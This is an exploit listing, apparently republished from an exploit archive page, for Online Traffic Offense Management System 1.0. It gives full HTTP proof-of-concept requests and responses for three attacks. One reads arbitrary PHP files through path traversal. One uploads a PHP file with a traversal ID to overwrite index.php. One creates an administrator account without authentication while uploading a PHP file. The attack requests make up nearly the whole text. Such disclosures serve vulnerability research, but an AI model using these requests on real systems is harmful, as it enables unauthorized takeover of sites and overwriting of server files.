Registeronline traffic offense management system 1.0 privilage escalation (unauthenticated)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### Privilage escalation # All requests can be sent by both an authenticated and a non-authenticated user # The vulnerabilities in the application allow for: * Reading any PHP file from the server * Saving files to parent and child directories and overwriting files in server * Performing operations by an unauthenticated user with application administrator rights ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 - Reading any PHP file from the server Example vuln scripts: http://localhost/traffic_offense/index.php?p= http://localhost/traffic_offense/admin/?page= # Request reading rrr.php file from other user in serwer GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:09:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close [...] </br></br>Hacked file other user in serwer!</br></br> [...] ----------------------------------------------------------------------------------------------------------------------- ## Example 2 - Saving files to parent and child directories and overwriting files in server # Request to read file GET /traffic_offense/index.php HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:30:56 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15095 <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Online Traffic Offense Management System - PHP</title> [...] ----------------------------------------------------------------------------------------------------------------------- # Request to overwrite file index.php in main directory webapp POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403 Content-Length: 1928 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4 Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="id" 5/../../../index -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="license_id_no" GBN-1020061 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="lastname" Blake -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="firstname" Claire -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="middlename" C -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="dob" 1992-10-12 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="present_address" Sample Addss 123 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="permanent_address" Sample Addess 123 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="civil_status" Married -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="nationality" Filipino -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="contact" 09121789456 -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="license_type" Non-Professional -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="image_path" uploads/drivers/ -----------------------------329606699635951312463334027403 Content-Disposition: form-data; name="img"; filename="fuzzdb.php" Content-Type: image/png <?php echo "Hacked other client files in this hosting!"; ?> -----------------------------329606699635951312463334027403-- # New file have extention as this write filename="fuzzdb.php" # New file have name and locate 5/../../../index we can save file in other directory ;) # Line must start digit # We can rewrite config files ----------------------------------------------------------------------------------------------------------------------- # Respopnse HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:38:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- # Request to read file index.php again GET /traffic_offense/index.php HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:42:17 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 42 Connection: close Content-Type: text/html; charset=UTF-8 Hacked other client files in this hosting! ----------------------------------------------------------------------------------------------------------------------- ## Example 4 - Performing operations by an unauthenticated user with application administrator rights # The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable # Request adding new admin user to application by sending a request by an authorized user POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 Content-Length: 949 Origin: http://localhost Connection: close Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="id" 21 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="firstname" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="lastname" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="username" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="password" hack -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="type" 1 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="img"; filename="aaa.php" Content-Type: application/octet-stream <?php phpinfo(); ?> -----------------------------210106920639395210803657370685-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 10:50:36 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 # The request worked fine, log into the app using your hack account
Online traffic offense management system 1.0 privilage escalation (unauthenticated) Vulnerability / Exploit Source : Online traffic offense management system 1.0 privilage escalation (unauthenticated)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes